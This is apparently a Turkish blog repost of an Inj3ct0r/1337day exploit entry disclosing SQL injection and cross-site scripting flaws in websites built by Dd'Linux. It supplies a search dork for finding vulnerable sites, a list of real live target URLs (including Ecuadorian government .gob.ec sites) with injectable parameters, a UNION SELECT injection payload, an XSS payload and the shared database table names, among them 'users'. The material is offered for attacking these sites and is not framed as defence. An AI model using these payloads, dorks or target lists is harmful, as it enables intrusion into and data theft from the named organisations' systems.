Dd'Linux – SQL Injection / Cross-Site Scripting Vulnerabilities

Dd’Linux – SQL Injection / Cross-Site Scripting Vulnerabilities açıkları bulundu. Açık hakkındaki açıklamalar şu şekilde.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /'             __  /'__`        / __  /'__`                    0
0   /_,     ___   /_/_      ___  ,_/ /   _ ___            1
1   /_/  /' _ ` / /_/__<_  /'___  /    /`'__           0
0        / /    /   / __/  _  _   /            1
1        _ _ __   ____/ ____\ __\ ____/ _            0
0        /_//_//_/ _ /___/  /____/ /__/ /___/  /_/            1
1                    ____/ >> Exploit database separated by exploit    0
0                    /___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1               ==========================================               1
0               I'm Taurus Omar Member From Inj3ct0r TEAM                1
1               ==========================================               0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
|                                                                        |
|    Dd'Linux - SQL Injection  / Cross-Site Scripting Vulnerabilities    |
--------------------------------------------------------------------------

+----------------| ABOUT ME |--------------------+
NAME:     TAURUS OMAR                            -
HOME:     ACCESOILEGAL.BLOGSPOT.COM              -
FBOOK:    facebook.com/OMARTAURUS                -
TWITTER:  @taurusomar_                           -
E-MAIL:   omar-taurus[at]dragonsecurity[dot]org  -
E-MAIL:   omar-taurus[at]live[dot]com            -
PWNED:    #ZUUU                                  -
+------------------------------------------------+

# Exploit Title: Dd'linux - SQL Injection  / Cross-Site Scripting Vulnerabilities
# Vendor Name: Dd'linux
# Url Vendor: http://www.ddlinux.com/
# Category: WebApps
# Type: php
# Risk:  Critical
# Dork: intext:"Desarrollado por dd'linux"

# Example/Sql=> http//site.com/xxxx?id=
# Example/Xss=> http//site.com/search.php [XSS]


# Sample/Sql
http://www.avso.com.ec/galeria_foto.php?codigo_album=12%'
http://www.babahoyo.gob.ec/pagina.php?id=6%'
http://david.ddlinux.com/galeria_foto.php?codigo_album=4%'
http://www.coac-sanfra.com/pagina.php?id=1%'
http://www.chibuleo.com/novedad.php?codigo=3%'
http://www.emapa.gob.ec/galeria_foto.php?codigo_album=5%'
http://www.galapagostech.com/index.php?id=1%'
http://www.fmrumba.com/contactenos.php?id=7%'
http://www.bioalimentar.com.ec/avimentos/plan_alimenticio.php?id=1%'

# Comand/Sql/Payload=> UNION ALL SELECT CONCAT(CHAR(58,105,107,113,58),IFNULL(CAST(CHAR(115,80,76,103,105,73,101,82,73,107) AS CHAR),CHAR(32)),CHAR(58,100,113,119,58)), NULL#

# Info => Same Tables and Columns All Vulnerability Site's
+-------------------------+
| agenda                  |
| album                   |
| banner                  |
| banner_ubicacion        |
| contador                |
| imagen                  |
| imagenes_animacion      |
| mails                   |
| mails_paginas           |
| noticia                 |
| opcion                  |
| opcion1                 |
| opcion2                 |
| opciones                |
| opciones1               |
| transparencia_archivo   |
| transparencia_categoria |
| users                   |
| varios                  |
+-------------------------+

# Sample/Xss
http://david.ddlinux.com/buscar.php
http://www.fmrumba.com/buscar.php
http://www.babahoyo.gob.ec/buscar.php

# Comand/Xss/=> "><img src=x onerror=alert("1337");>

# Vulnerability/Code
<tbody><tr>
<td><input name="busqueda" id="busqueda" value="" size="15" type="text">
<input name="Submit" class="secondaryAction" id="Submit" value="" type="submit"></td>
</tr>
</tbody>

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir